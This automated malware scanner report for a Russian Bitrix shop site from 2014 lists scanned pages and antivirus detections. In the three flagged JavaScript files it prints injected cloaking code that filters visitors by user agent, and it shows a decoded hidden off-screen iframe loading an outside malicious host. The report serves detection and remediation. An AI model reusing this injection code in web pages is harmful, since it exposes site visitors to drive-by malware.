Malware Scanner report for somresurs.ru

Malicious/Suspicious/Total URLs checked
3/1/20
4 pages have malicious or suspicious code. See details below.
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Scanned pages/files

Request | Server response | Status
http://somresurs.ru/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:33 GMT
Location: http://www.somresurs.ru/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
clean
http://www.somresurs.ru/
200 OK
Content-Length: 65411
Content-Type: text/html
clean
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_main/kernel_main.js?1385123422307042
200 OK
Content-Length: 303537
Content-Type: application/javascript
clean
http://somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:36 GMT
Location: http://www.somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 367
Content-Type: text/html; charset=iso-8859-1
clean
http://www.somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119
200 OK
Content-Length: 95119
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh';
denygros
... 3290 bytes are skipped ...
eHeader:function(e){var n;if(E===2){if(!s){s={};while(n=pn.exec(i))s[n[1].toLowerCase()]=n[2]}n=s[e.toLowerCase()]}return n===t?null:n},overrideMimeType:function(e){return E||(c.mimeType=e),this},abort:function(e){return e=e||S,o&&o.abort(e),T(0,e),this}};d.promise(x),x.success=x.done,x.error=x.fail,x.complete=m.add,x.statusCode=function(e){if(e){var t;if(E<2)for(t in e)g[t]=[g[t],e[t]];else t=e[x.status],x.always(t)}return this},c.url=((e||c.url)+"").replace(hn,"").replace(mn,ln[1]+"

Antivirus reports:

Avast: JS:Iframe-EHG [Trj]
DrWeb: JS.IFrame.566
Fortinet: JS/IFrame.XX!tr
Avira: HTML/Rce.Gen
AVG: HTML/Framer
Sophos: Troj/JSRedir-LH

http://somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:36 GMT
Location: http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 401
Content-Type: text/html; charset=iso-8859-1
clean
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999
200 OK
Content-Length: 2999
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;
;
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'
... 2238 bytes are skipped ...
thWnd = false;
function BxShowAuthFloat(id, suffix)
{
var bCreated = false;
if(!bxAuthWnd)
{
bxAuthWnd = new BX.CDialog({
'content':'<div id="bx_auth_float_container"></div>',
'width': 640,
'height': 400,
'resizable': false
});
bCreated = true;
}
bxAuthWnd.Show();
if(bCreated)
BX('bx_auth_float_container').appendChild(BX('bx_auth_float'));

BxShowAuthService(id, suffix);
}
;

Decoded script:


<iframe src=http://jaxworks.ru/ghj5.u35hh55hj?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

Antivirus reports:

Avast: JS:Iframe-EHG [Trj]
McAfee-GW-Edition: JS/Iframe.gen.ae
Fortinet: JS/IFrame.XX!tr
McAfee: JS/Iframe.gen.ae
AVG: HTML/Framer
Sophos: Troj/JSRedir-LH

http://somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:36 GMT
Location: http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 476
Content-Type: text/html; charset=iso-8859-1
clean
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607
200 OK
Content-Length: 106607
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

$(".tabsblock > .tabs > a").live('click', function() {
var ind = $(this).index();
ind++;
if ($(this).hasClass("active")){} else
{
$(this).parents('.tabsblock').find('.active').removeClass('active')
$(this).addClass('active');
$(".tabsblock").find(".cnt:nth-child("+ind+")").addClass('active');
}
return false;
});
$("#notify_auth_form > .social > form > ul > li > a").live('click', function() {
setTimeout(function()
... 3516 bytes are skipped ...
.body.appendChild(document.createElement("DIV"));
this.WAIT.style.backgroundImage = "url('" + this.arParams.WAIT_IMAGE + "')";
if(!BX.browser.IsIE())
this.WAIT.style.backgroundRepeat = 'none';
this.WAIT.style.display = 'none';
this.WAIT.style.position = 'absolute';
this.WAIT.style.zIndex = '1100';
}
setTimeout(this.onTimeout, 500);
}
BX.ready(function (){_this.Init(arParams)});
}
;;
;
;
;
;
;
;

Antivirus reports:

Avast: JS:Iframe-EHG [Trj]
Avira: HTML/Rce.Gen
AVG: HTML/Framer

http://somresurs.ru/about/how_to_order/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:37 GMT
Location: http://www.somresurs.ru/about/how_to_order/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 329
Content-Type: text/html; charset=iso-8859-1
clean
http://www.somresurs.ru/about/how_to_order/
200 OK
Content-Length: 45518
Content-Type: text/html
clean
http://www.somresurs.ru/about/delivery/
200 OK
Content-Length: 45077
Content-Type: text/html
clean
http://www.somresurs.ru/about/vacancy/
200 OK
Content-Length: 45391
Content-Type: text/html
clean
http://www.somresurs.ru/about/price/
200 OK
Content-Length: 140092
Content-Type: text/html
clean
http://www.somresurs.ru/about/contacts/
200 OK
Content-Length: 46045
Content-Type: text/html
clean
http://www.somresurs.ru//api-maps.yandex.ru/services/constructor/1.0/js/?sid=w0m3YAtXPDJ7nhOcEz2BI9rjn0qCkOGc&width=600&height=450/
404 Not Found
Content-Length: 41450
Content-Type: text/html
clean
http://www.somresurs.ru/login/?backurl=%2Fapi-maps.yandex.ru%2Fservices%2Fconstructor%2F1.0%2Fjs%2F%3Fsid%3Dw0m3YAtXPDJ7nhOcEz2BI9rjn0qCkOGc%26width%3D600%26height%3D450%252F
200 OK
Content-Length: 50538
Content-Type: text/html
clean
http://www.somresurs.ru/login/?backurl=%2Flogin%2F
200 OK
Content-Length: 49422
Content-Type: text/html
clean
http://www.somresurs.ru/login/?register=yes&backurl=%2Flogin%2F
200 OK
Content-Length: 46896
Content-Type: text/html
suspicious
Suspicious code found

<form method="post" action="/login/?register=yes&amp;backurl=%2Flogin%2F" name="bform">
<input type="hidden" name="backurl" value="/login/?backurl=%2Flogin%2F" />
<input type="hidden" name="AUTH_FORM" value="Y" />
<input type="hidden" name="TYPE" value="REGISTRATION" />
Имя<br>
<input type="text" name="USER_NAME" maxlength="50" value="" /><br/><br/>
Фамилия<br>
<input type="text"
... 1082 bytes are skipped ...
br>
<input type="text" name="captcha_word" maxlength="50" value="" />
<p style="clear: left;"><input type="hidden" name="captcha_sid" value="01468dcf3071f386fc33eab6f4d0ca61" />
<img src="/bitrix/tools/captcha.php?captcha_sid=01468dcf3071f386fc33eab6f4d0ca61" width="180" height="40" alt="CAPTCHA" /></p>
<input type="submit" class="bt3" style="width:100%;" name="Register" value="Зарегистрироваться" />
</form>

http://www.somresurs.ru/personal/cart/
200 OK
Content-Length: 45307
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: somresurs.ru

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:33 GMT
Location: http://www.somresurs.ru/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1

...310 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: somresurs.ru
Referer: http://www.google.com/search?q=somresurs.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=somresurs.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://somresurs.ru/

Result: somresurs.ru is not infected or malware details are not published yet.